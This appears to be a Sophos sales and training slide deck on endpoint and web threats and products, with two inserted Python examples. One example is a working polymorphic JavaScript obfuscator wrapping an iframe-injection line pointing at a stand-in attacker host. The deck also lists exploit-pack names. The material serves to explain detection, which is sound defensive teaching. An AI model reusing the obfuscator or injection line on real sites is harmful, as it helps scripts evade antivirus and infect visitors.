
Endpoint and web security

What?

Variants and volumes

APT: what does it mean?


Before Aurora

Now

Custom Exploit Code

Better than us

Multiple Entry/Exit points

We didn't notice for a while

Diverse Actors

Insert random foreign country here

Hijacked trusted sites


There's no such thing as a trusted site

Fake anti-virus/scareware
Fake anti-virus
Fake anti-spyware
System optimizers

Et tu, Mac?
MacDefender, MacSecurity, and many more

Social networking raises risks

Koobface
Feature rich and evolving

Steal software keys


Upload stored passwords
Web server
DNS proxy
Search hijacking
CAPTCHA busting
Pay Per Click (PPC) fraud
Fake anti-virus installs
Social network spambot

Screenshot courtesy of abuse.ch

Who?

Affiliate marketing, Russian style

Estdomains

McColo
Botnet C&C
Spam sites
Child abuse content
Malware
Fake anti-virus
Identity Theft (500,000+ Bank accounts)

Little penalty for great gains

150 Years
$13-65 Billion

Probation and 30 hours community service
Infected millions of PCs

How?

Spamming tools increase SEO


Multithreaded web spam tool
Automatically creates forum/blog/webmail accounts
Uses proxies for IP diversity
CAPTCHA busting
Content based on topic
Price: $440
Supports PHPBB, PHPNuke, wikis, LiveJournal, vBulletin, Facebook, Gmail, etc.

Server-side polymorphism
Obfuscation engine on the server (PHP)
JavaScript returned changes on each page request
Challenge to generic detection: the core AV engine needs to see through the obfuscation
Cannot afford a performance hit
Large effort in building heuristics to distinguish legitimate from malicious JavaScript
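As an added illustration of the slide above (example code written for this page, not Sophos's engine and not any real exploit pack): a Python stand-in for the server-side obfuscator that hands out different JavaScript on every request, beside a detector that reproduces the decode step and matches a signature on the normalized text rather than on the delivered bytes. The payload, the XOR scheme, the identifier names, the host attacker.invalid and all function names are assumptions. A real engine emulates JavaScript generically instead of pattern-matching one scheme as this does; the point shown is only why a hash or byte signature on the raw script never matches twice while a signature on the decoded payload does.

```python
"""Server-side polymorphism versus a decode-based detector.

Added example for this page, not Sophos code: a stand-in for a PHP
obfuscation engine that returns different JavaScript on every request, and
a detector that normalizes the script by reproducing the decode step."""
import hashlib
import random
import re

# Constructed, harmless stand-in for an exploit-pack landing script.
PAYLOAD = 'document.write("<iframe src=\\"http://attacker.invalid/x\\"></iframe>");'
LETTERS = "abcdefghijklmnopqrstuvwxyz"


def fresh_name(rng, used):
    """Random identifier not yet handed out for this request."""
    while True:
        name = "_" + "".join(rng.choice(LETTERS) for _ in range(rng.randrange(4, 9)))
        if name not in used:
            used.add(name)
            return name


def serve_polymorphic(payload, rng):
    """Emulate the server side: fresh XOR key, fresh identifier names, random
    dead code and a randomly chosen eval spelling per request, so the bytes
    sent to the browser never repeat although the decoded payload is fixed."""
    key = rng.randrange(1, 256)
    used = set()
    data, k, out, i, junk = (fresh_name(rng, used) for _ in range(5))
    encoded = ",".join(str(ord(c) ^ key) for c in payload)
    evaluator = rng.choice(["eval({0})", 'window["eval"]({0})', "(0,eval)({0})"])
    return (
        f"var {junk}={rng.randrange(1000, 9999)};"  # dead code: changes the hash only
        f"var {data}=[{encoded}];var {k}={key};var {out}='';"
        f"for(var {i}=0;{i}<{data}.length;{i}++)"
        f"{{{out}+=String.fromCharCode({data}[{i}]^{k});}}"
        + evaluator.format(out) + ";"
    )


# The decode loop is the one thing the server cannot randomize away.
DECODE_LOOP = re.compile(r"String\.fromCharCode\((\w+)\[\w+\]\^(\w+)\)")


def see_through(script):
    """Undo the XOR layer the way an engine's emulation step would: find the
    decode loop, pull the array and key it references, return the plaintext.
    Returns None when the script does not use this scheme."""
    m = DECODE_LOOP.search(script)
    if not m:
        return None
    data_var, key_var = m.groups()
    arr = re.search(r"var %s=\[([\d,]+)\];" % re.escape(data_var), script)
    key = re.search(r"var %s=(\d+);" % re.escape(key_var), script)
    if not (arr and key):
        return None
    k = int(key.group(1))
    return "".join(chr(int(n) ^ k) for n in arr.group(1).split(","))


def fingerprint(text):
    return hashlib.sha256(text.encode()).hexdigest()


# Signature applied to the normalized text, never to the delivered bytes.
IFRAME_INJECT = re.compile(r'document\.write\("<iframe\s+src=')


def classify(script):
    """Return (hash of decoded payload, verdict); the hash is stable across
    variants, the hash of the raw script is not."""
    plain = see_through(script)
    if plain is None:
        return None, "no decode layer found"
    return fingerprint(plain), "malicious" if IFRAME_INJECT.search(plain) else "clean"


def demo(seed_a=1, seed_b=2):
    """Two requests to the same landing page, as seen by a byte signature
    (raw hashes) and by the decode-based detector (decoded hashes)."""
    a = serve_polymorphic(PAYLOAD, random.Random(seed_a))
    b = serve_polymorphic(PAYLOAD, random.Random(seed_b))
    return {
        "raw_hashes_differ": fingerprint(a) != fingerprint(b),
        "decoded_hashes_equal": classify(a)[0] == classify(b)[0],
        "roundtrip": see_through(a) == PAYLOAD,
        "verdicts": (classify(a)[1], classify(b)[1]),
    }


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the two raw scripts hashing differently while both decode to the same payload and the same verdict. The cost the slide mentions is visible here too: the detector has to do work per script (here two regex passes and a decode loop, in a real engine a bounded JavaScript emulation) on every page load, which is why the heuristics have to be cheap and why generic detection of the decode structure matters more than any signature on the output.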

Web threat tree: legitimate sites -> redirects to attacker -> attacks vulnerabilities -> delivers payload

Why?

Motives
Yes, stereotypes

Intellectual property is the new gold


Zero day Flash vulnerability
Inadequate monitoring
Victims of their own success

Pharma profitability

Date  Orders
01        30
02        74
03       216
04       193
05       231
06       191
07       189
08        78
09        99
10       128
11        52
12

Average sales per day: 124
124 orders per day x $160 average sale = $19,840 per day; at 40% commission = $7,936/day
This affiliate used 66 unique domains referencing his Affiliate ID

Fake anti-virus profitability


Statistics from topsale2.ru

What's it worth?

Pirated software

Endpoint protection: Exchange server protection, application control, device control, anti-malware, access control, virtualization, intrusion prevention, web protection, firewall, encryption, data control, patch assessment

Anti-malware
Stop attacks and breaches

Sophos AV
A single engine to protect from all malware
Genotyping technology
Active Protection cloud technologies:
Live URL filter: stops URLs we know are bad instantly
Live anti-virus: checks in seconds whether a suspicious file might be a real threat
Fast and low impact scanning
Small updates, frequently applied

Intrusion prevention
Stop attacks and breaches

Sophos HIPS

Behavioral detection
Suspicious file detection
Suspicious behavior detection
Buffer overflow detection
Rules created by SophosLabs via Active Protection

So reliable it's on by default

Malware solved
Stop attacks and breaches

http://www.sophos.com/support/knowledgebase/article/113342.html

Layered protection
Stop attacks and breaches

Active Protection
Stop attacks and breaches

Endpoint

Web

Email

Data

Mobile

Network

Not just a windows story

The web: one stop (malware) shop


Protect everywhere

A threat network

The number one source of infection

Legitimate sites are regularly infected

Productivity filtering isn't enough

Many applications accessing the web

How people do web protection today

Large scale deployments that focus on the gateway

Back-hauling traffic to appliances

None or limited protection for users not connecting to the gateway

Web protection
Protect everywhere

Basic Endpoint

Active Protection from malware and bad sites


Works in any browser

Web Filtering in Endpoint

Low-cost add-on integrated into the Endpoint/SEC


Reduce the attack surface from risky parts of the web (porn, hate, P2P, etc.)
Essential compliance and liability coverage for inappropriate sites

Web Protection Suite

Complete protection everywhere users go with Sophos LiveConnect


Full coverage of threats, compliance, productivity, liability, and visibility
Reduce investment & complexity in back-hauling/VPN/Gateway HW

Inside Sophos LiveConnect


Protect everywhere

Sophos Web Protection Suite

Enables full visibility and control


Policy and reporting synchronization
Immediate and automatic
Secure end-to-end encryption

Sophos Web Protection

Keep people working
Sophos Web Protection


NEW! Web Protection Suite
Complete web protection everywhere

NEW! Virtual Web Appliance (VMware)


Secure web gateway in a virtual appliance

NEW! Web Appliances (4 models)


Secure web gateway appliances

Patches as important as ever


Reduce attack surface

[Chart: endpoints broken down by anti-virus status (current / out of date / none), firewall status (enabled / disabled / none) and patch status (patched / unpatched). Source: MSRC, August 2012]

The problem with patching


Reduce attack surface

No visibility of exposure level


Have users installed vulnerable applications?
Have users disabled automatic updates?
Is Microsoft WSUS/SCCM working correctly?
Don't know which patches to worry about!

Compliance audits become a real headache


Machines get compromised
Gartner: in 90% of cases where machines were compromised, a patch or configuration change existed that could have prevented it!

Patch assessment
Reduce attack surface

We assess all the key exploited applications


Checking for patches from 11 vendors

We accurately assess each endpoint


Local scans on every managed endpoint
Complex fingerprinting ensures patches accurately detected
Centralized reporting of relevant missing patches
Simple: no end-user interaction or messaging

We prioritize patches to make life easier


Sophos rates patch criticality via Active Protection
Sophos shows any malware associated with patches
Creates a focus on the patches that really matter!
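The two slides above describe the mechanics of patch assessment (local version fingerprinting on each endpoint, central reporting of missing patches, prioritization by criticality and known malware use). The following is an added example written for this page, not Sophos code: it runs that logic over a constructed inventory and a constructed advisory table. Product names, version numbers, criticality ratings and the malware flags are illustrative values, not real advisory data. The one edge case it makes a point of handling is version comparison: "7u10" sorts before "7u7" as a string, so a scanner that compares strings reports a patched host as exposed (or an exposed host as patched, depending on direction), which is the kind of inaccuracy the slide's "complex fingerprinting" is meant to avoid.

```python
"""Patch assessment by version fingerprinting.

Added example for this page, not Sophos code: compares the version each
endpoint reports for an application against the first fixed version in a
constructed advisory table, then ranks the missing patches by malware use
and criticality so the ones that matter come first."""
import re

CRITICALITY = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# Constructed advisory table, not real advisory data:
# (product, first fixed version, criticality, malware known to exploit it).
ADVISORIES = [
    ("Flash Player", "11.4.402.265", "critical", True),
    ("Java", "7u7", "critical", True),
    ("PDF Reader", "10.1.4", "high", False),
    ("Browser", "15.0.1", "medium", False),
]

# Constructed inventory as a local scan on each managed endpoint would report it.
INVENTORY = {
    "laptop-01": {"auto_update": False,
                  "apps": {"Flash Player": "11.3.300.271", "Java": "7u5", "Browser": "15.0.1"}},
    "desktop-07": {"auto_update": True,
                   "apps": {"Flash Player": "11.4.402.265", "PDF Reader": "10.1.3"}},
    "kiosk-02": {"auto_update": True,
                 "apps": {"Java": "7u10", "Browser": "14.0"}},
}


def parse_version(s):
    """Numeric tuple so that 7u10 > 7u7 and 10.0.10 > 10.0.9; comparing the
    raw strings gets both of these wrong."""
    return tuple(int(p) for p in re.findall(r"\d+", s))


def is_vulnerable(installed, fixed):
    """Installed build is older than the first build carrying the fix."""
    return parse_version(installed) < parse_version(fixed)


def assess(inventory, advisories):
    """One finding per (endpoint, product) that is installed and unpatched,
    ordered so exploited-in-the-wild and critical patches come first."""
    findings = []
    for host, info in inventory.items():
        for product, fixed, crit, malware in advisories:
            installed = info["apps"].get(product)
            if installed is None:      # not installed: no exposure, no noise
                continue
            if is_vulnerable(installed, fixed):
                findings.append({
                    "host": host, "product": product,
                    "installed": installed, "fixed": fixed,
                    "criticality": crit, "malware_seen": malware,
                })
    findings.sort(key=lambda f: (not f["malware_seen"],
                                 CRITICALITY[f["criticality"]], f["host"]))
    return findings


def hosts_with_updates_disabled(inventory):
    """The 'have users disabled automatic updates?' question from the slide."""
    return sorted(h for h, info in inventory.items() if not info["auto_update"])


if __name__ == "__main__":
    for f in assess(INVENTORY, ADVISORIES):
        flag = "MALWARE SEEN" if f["malware_seen"] else ""
        print(f"{f['host']:<11} {f['product']:<13} {f['installed']:>13} -> "
              f"{f['fixed']:<13} {f['criticality']:<8} {flag}")
    print("auto-update disabled:", hosts_with_updates_disabled(INVENTORY))
```

The report lists laptop-01's Flash Player and Java first because both are flagged as exploited in the wild, then the high-rated PDF Reader gap on desktop-07, then the medium browser gap on kiosk-02; kiosk-02's Java 7u10 is correctly not reported against a 7u7 fix. A product that is not installed on a host produces no finding at all, which keeps the central report to patches that are actually relevant.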

Application control
Reduce attack surface

Malware exploits vulnerabilities in applications
Exploit packs are sold on the black market
Specifically designed to exploit your applications

Unauthorized or misused applications:
Users trying to install and run unauthorized applications
Some applications are risky
Unwanted applications might use bandwidth
Version control isn't easy

Some common exploit packs:

Blackhole Exploit 1.0
Blackhole Exploit 1.1
Bleeding Life 2.0
Bomba
CRIMEPACK 2.2.1
CRIMEPACK 2.2.8
CRIMEPACK 3.0
CRIMEPACK 3.1.3
Dloader
El Fiesta
Eleonore 1.3.2
Eleonore 1.4.1
Eleonore 1.4.4 Moded
Eleonore 1.6.3a
Eleonore 1.6.4
Fragus 1
Icepack
Impassioned Framework 1.0
Incognito
iPack
JustExploit
Katrin
Liberty 1.0.7
Liberty 2.1.0*
Lupit
Mpack
Mushroom/unknown
Open Source Exploit (Metapack)
Papka
Phoenix 2.0
Phoenix 2.1
Phoenix 2.2
Phoenix 2.3
Phoenix 2.4
Phoenix 2.5
Phoenix 2.7
Robopak
SEO Sploit pack
Siberia
T-Iframer
Unique Pack Sploit 2.1
Webattack
Yes Exploit 3.0RC
Zombie Infection kit
Zopack

Application control
Reduce attack surface

Over 40 categories including:

Online storage

Browsers

P2P File sharing

Instant messaging

Virtualization tools

Remote access

USB program launchers

Games

Toolbars

Applications created and updated via Active Protection

But I need all of these

Device control
Reduce attack surface

Plugging the device gap:

Devices can carry malware


They take data everywhere
If they're lost, can you be sure they're secure?
People will plug them in anywhere

Device control
Reduce attack surface

Control devices connected to computers


Granular control of:

Removable storage - USB keys, removable hard disks

Optical / disk drives - CD / DVD / HD-DVD / Blu-ray

Network devices:

Wi-Fi / Modems

Bluetooth

Infra-red

Data control
Stop attacks and breaches

Fully integrated endpoint DLP solution


Designed to prevent accidental data loss
Monitor and enforce on all common data exit points
Train staff through use of desktop prompts
Data types provided from Sophos via Active Protection
Integrated with email protection

PII

Client firewall
Stop attacks and breaches

Problem:

Open ports on PCs and Laptops are open doors to hackers


A computer without a firewall and connected to the internet is a target
Worms often target particular ports and protocols
Laptops can connect anywhere; you need different rules when they're outside your network

Solution:

Location aware policies


Identifies apps by checksum
Rollout invisible to users
Interactive management alerts to create rules
Stealth mode prevents unauthorized network access by hackers

Virtualization
We protect virtual environments. At no extra cost
Our lighter-weight agent is better than other traditional
Endpoint security solutions
Stagger scanning for virtual machines
No compromise on protection
Citrix Receiver plugin
Developing VMware vShield scanner

Encryption
Protect everywhere

Industrial strength full disk encryption


Deployed and managed from your endpoint console
Fast initial encryption
Full password recovery options

Deploy and manage


Keep people working

A single deployment wizard for all features


Single agent for:
Anti malware
HIPS
Device Control
Data Control
Web protection
Widest platform support
Console built for usability

Report

Report

Proof points
CRN: IT Buying Behaviors. What are middle market CIOs saying?
Adjusting to the new normal.
Middle market CIOs face the same day-to-day fight: they need to do more with less.
Small budgets and limited resources demand ROI on IT investments.
Bradley Burns, Technology Director, Duncan/Channon
...We are also looking for really good value: what kind of support we are going to
get, the product features. We look for all-in-one solutions with overall value.
Tony Diaz, Director of Information Technology, Montgomery & Co.
...CIOs have to take things in-house and choose vendor partners who offer more
all-in-one solutions for cheaper costs.

Different opinions, similar consensus

Smaller budgets and limited IT resources define buying behaviors. It's all about finding
all-in-one solutions and riding out current technology to its maximum lifeline.

Sophos is leading the way


In B2B End-to-End Security

Security as an
add-on to a
platform

Partial security

Security portfolio

Complete
security
without
complexity

Complete Security

Learning Exercises
Endpoint & Web Security
Scenario #1

School Town of Munster has 4,000 students with over 3,200 notebook computers in use across the network

Business Challenges

Cost: Munster faced a $3 million cut in state aid on top of previous cuts

Performance: Symantec's Endpoint Client put too much overhead on machines

Protection: Munster needed to protect 2,800 notebook computers for school and home use

Which Sophos fit?

They consolidated their protection with Sophos in 2012 with the Complete Security
Suite

Includes endpoint protection, advanced web protection, full-disk encryption, email


security, and data protection

Learning Exercises
Endpoint & Web Security
Scenario #2
Investors Savings Bank 500 users, 52 locations across 8 countries

Business Challenges

Need more control protecting network and data from rapidly evolving security
threats

Also wanted to ensure compliance with tighter industry standards and government
regulations

Which Sophos fit?

Sophos web appliance is protecting the bank against malware, phishing threats and
unwanted applications

Sophos email appliance is stopping spam, phishing, malware and data leakage

Sophos Endpoint Security and Control is providing tight, proactive security

Learning Exercises
Endpoint & Web Security
Scenario #3
Taco Bueno restaurant franchise has over 1,000 users across nine states

Business Challenges

Gain greater control over users' access to VoIP, games, social networking and other applications that threaten security as well as productivity

Strengthen its PCI compliance measures to further protect its customers' credit card
data

Which Sophos fit?

Sophos's professional services team helped upgrade all machines on its network for 190 restaurants across nine states

Upgrading the existing Sophos endpoint solution took the IT team less than two
hours

Taco Bueno chose Sophos Email Security, Sophos Web Security and Sophos
Endpoint Security and Control

Learning Exercises
Endpoint & Web Security
Scenario #4
Hitachi Medical Systems has 2 locations with 450 Users that include a large mobile
workforce

Business Challenges

Road-warriors were consistently bringing their infected laptops for IT to fix

Infected laptops are regularly returned to IT to repair the same problems

IT would like to monitor and report on what these users are doing

While controlling the sites they visit is not critical, understanding what's going on is

Which Sophos fit?

Sophos Endpoint Protection

Sophos Web Protection

Complete Security
